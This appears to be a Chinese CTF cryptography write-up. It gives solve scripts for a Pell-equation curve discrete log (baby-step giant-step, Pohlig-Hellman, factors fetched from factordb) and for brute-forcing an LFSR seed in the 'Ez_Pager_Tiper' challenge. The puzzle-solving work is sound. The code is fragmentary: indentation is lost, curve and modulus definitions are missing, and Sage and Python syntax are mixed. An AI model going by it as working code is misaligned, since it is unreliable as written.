配方乘佩尔方程然后映射在$GF(p)$然后跑dlp
2
y模p是线性的
3
阶$p+1$,而且光滑直接ph
from functools import reduce
import requests
from gmpy2 import gcd, invert
def _bsgs(g: int, h: int, m: int, bound=None) -> int:
d = int(pow(bound[1] - bound[0], 0.5)) + 1
baby = {}
baby_start = h
gian_start = pow(g, bound[0], m)
y_d = pow(g, d, m)
inv = invert(g, m)
for i in range(d):
baby[baby_start] = i
baby_start = (baby_start * inv) % m
for i in range(d):
if gian_start in baby:
r, s = i, baby[gian_start]
break
gian_start = (gian_start * y_d) % m
else:
raise RuntimeError('no solution')
return (r * d + s) + bound[0]
def ebsgs(g: int, h: int, m: int, bound=None) -> int:
"""
gcd(g, m) != 1
"""
if h == 1:
return 0
cnt, temp = 0, 1
while True:
d = gcd(g, m)
if d == 1:
break
if h % d:
raise Exception('no solution')
h //= d
m //= d
temp = temp * (g // d) % m
cnt += 1
if temp == h:
return cnt
h = h * invert(d, m) % m
return cnt + _bsgs(g, h, m, (max(bound[0] - cnt, 0), bound[1] - cnt))
def bsgs(g: int, h: int, m: int, bound=None) -> int:
"""
g ^ x == h mod(m)
:param g:
:param h:
:param m:
:param bound: low bound <= x <= up bound
:return: x
"""
g %= m
h %= m
if h == 1:
return 0
d = gcd(g, m)
if h % d:
print(g, h, m)
raise Exception('no solution')
if bound is None:
bound = (0, m)
else:
assert type(bound) == tuple
if d != 1:
return ebsgs(g, h, m, bound)
else:
return _bsgs(g, h, m, bound)
def get_factor(n_to_fac: int) -> list:
response = requests.get(r'http://factordb.com/api', params={"query": str(n_to_fac)})
facs = []
for one in response.json().get("factors"):
facs += [int(one[0])] * one[1]
return facs
def crt(remainder_list, mod_list):
mod_product = reduce(lambda a, b: a * b, mod_list)
mi_list = [mod_product // _ for _ in mod_list]
mi_inverse = [invert(mi_list[i], mod_list[i]) for i in range(len(mi_list))]
r = 0
for i in range(len(remainder_list)):
r += mi_list[i] * mi_inverse[i] * remainder_list[i]
r %= mod_product
return r
def get_order(g: int, _p: int, factors: list) -> tuple([int, list]):
order = _p - 1
ord_factors = []
for f in factors:
if pow(g, order // f, _p) == 1:
order //= f
else:
ord_factors.append(f)
return order, [(i, ord_factors.count(i)) for i in set(ord_factors)]
def pohlig_hellman(g, h, p) -> int:
factor_list = get_factor(p + 1)
# print(factor_list)
order, order_factor_list = get_order(g, p, factor_list)
xs = []
for factor_tuple in order_factor_list:
_g = pow(g, order // factor_tuple[0], p)
xs.append(0)
for i in range(factor_tuple[1]):
_h = h
_h = (_h * invert(pow(g, xs[-1], p), p)) % p
_h = pow(_h, order // (factor_tuple[0] ** (i + 1)), p)
r = bsgs(_g, _h, p, (0, factor_tuple[0]))
xs[-1] += r * (factor_tuple[0] ** i)
return crt(xs, [one[0] ** one[1] for one in order_factor_list])
if __name__ == '__main__':
curve = SpecialCurve(
52373730653143623993722188411805072409768054271090317191163373082830382186155222057388907031638565243831629283127812681929449631957644692314271061305360051,
28655236915186704327844312279364325861102737672471191366040478446302230316126579253163690638394777612892597409996413924040027276002261574013341150279408716,
42416029226399083779760024372262489355327595236815424404537477696856946194575702884812426801334149232783155054432357826688204061261064100317825443760789993)
G = (
15928930551986151950313548861530582114536854007449249930339281771205424453985946290830967245733880747219865184207937142979512907006835750179101295088805979,
29726385672383966862722624018664799344530038744596171136235079529609085682764414035677068447708040589338778102975312549905710028842378574272316925268724240)
Q = (
38121552296651560305666865284721153617113944344833289618523344614838728589487183141203437711082603199613749216407692351802119887009907921660398772094998382,
26933444836972639216676645467487306576059428042654421228626400416790420281717654664520663525738892984862698457685902674487454159311739553538883303065780163)
ans = pohlig_hellman(G, Q, p)
print('answer:', ans)
Ez_Pager_Tiper
题目加密手段的confusion函数形同虚设,在Problem1中confusion函数直接返回第二个参数,Problem2中返回两参数的异或,有了这个规律,就能通过消息开头的明文Date: xxxx-xx-xx形式以及文件名解码,得到消息1加密的mask1,在消息2中通过爆破初始seed2的方式,推测seed1和mask1,根据解密的消息来判断爆破终点。
解密1的脚本与解密2中重复,当时是在shell做的,不再提供。下面给出第二步exp
from magic_box import lfsr
from tqdm import tqdm
from Crypto.Util.number import *
f = open("MTk4NC0xMi0yNQ==_76ff.enc", 'rb')
data = f.read()
f.close()
out1 = b'\\\x9e\xd1R\x9c\x15\x139\xc5\x1b\xa07\xd5W\x96\xd3' # Xor of "Date: xxxx-xx-xx and cipher"
out1 = bytes_to_long(out1)
out1 = bin(out1)[2:].zfill(128)
for i in tqdm(range(2^12)):
l2 = lfsr(i, 2053, 12)
d2 = Integer(i).digits(2, padto=12)[::-1]
print("generating...")
while len(d2) < 128:
d2.append(l2.next())
l1 = []
for j in range(128):
l1.append(d2[j] ^ int(out1[j]))
A = []
for j in range(64):
A.append(l1[j:j+64])
A = Matrix(Zmod(2), A)
y = l1[64:128]
y = vector(Zmod(2), y)
print("solving...")
try:
mask1 = A.solve_right(y)
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
continue
print("calculating...")
mask1 = int(''.join([str(each) for each in mask1]), 2)
l1 = lfsr(int(''.join([str(each) for each in l1[64:128]]), 2), mask1, 64)
s = ''
try:
for each in data[16:64]:
this = each ^ (l1.getrandbit(8) ^ l2.getrandbit(8))
s += long_to_bytes(this).decode()
print(s)
break
except KeyboardInterrupt:
raise KeyboardInterrupt
except:
continue